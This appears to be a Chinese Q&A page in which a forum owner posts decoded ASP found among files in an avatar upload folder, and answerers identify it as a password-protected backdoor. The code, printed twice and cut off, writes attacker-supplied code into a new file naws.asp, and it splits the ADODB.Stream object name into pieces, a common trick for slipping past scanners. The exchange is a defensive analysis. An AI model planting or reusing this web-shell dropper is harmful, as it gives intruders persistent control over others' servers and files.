UC知道这段ASP干嘛的
来源:百度知道 编辑:UC知道 时间:2024/05/26 14:32:14
在论坛的上传头像文件夹里面看到几个非图片文件,其中有几个加了密,在网上的一个在线解密网站解密之后是这样的内容——
<%@ LANGUAGE = VBScript.Encode%>
<%
UserPass="zhuhaiaw"
if request("action")="save" then:if request("pass")=UserPass and request("code")<>"" then:set q=server.CreateObject("Ad"&"od"&"b.S"&"tr"&"eam"):q.Open:q.Type=2:q.CharSet="gb2312":q.writetext request("code"):q.SaveToFile server.mappath("naws.asp"),2 :q.Close:set q=nothing:response.redirect "naws.asp":else:msg="NO":end if:end if:response.write"<form id='form1' name='form1' method='post' action='?action=save' style='text-align:center'>":if msg<>"" then response.write "<font color=red><b>"&msg & "</b></font><hr>":end if:response.write"<label><input
<%@ LANGUAGE = VBScript.Encode%>
<%
UserPass="zhuhaiaw"
if request("action")="save" then:if request("pass")=UserPass and request("code")<>"" then:set q=server.CreateObject("Ad"&"od"&"b.S"&"tr"&"eam"):q.Open:q.Type=2:q.CharSet="gb2312":q.writetext request("code"):q.SaveToFile server.mappath("naws.asp"),2 :q.Close:set q=nothing:response.redirect "naws.asp":else:msg="NO":end if:end if:response.write"<form id='form1' name='form1' method='post' action='?action=save' style='text-align:center'>":if msg<>"" then response.write "<font color=red><b>"&msg & "</b></font><hr>":end if:response.write"<label><input
这是一段asp后门,作用是当上传这个文件的人用他自己设的密码访问这个页面后,他可以在这个页面中写入跟强大的asp木马代码,保存后会在服务器目录下生成一个naws.asp的asp木马,这个木马可以访问你服务器上的所有文件也可以对它们进行修改删除上传新文件等操作,他等于有了和你一样的权限
这个页面就象一个门,让贼进来的门,这个贼私设的门只有他有钥匙
这个应该是加密后输出事的 掉用文件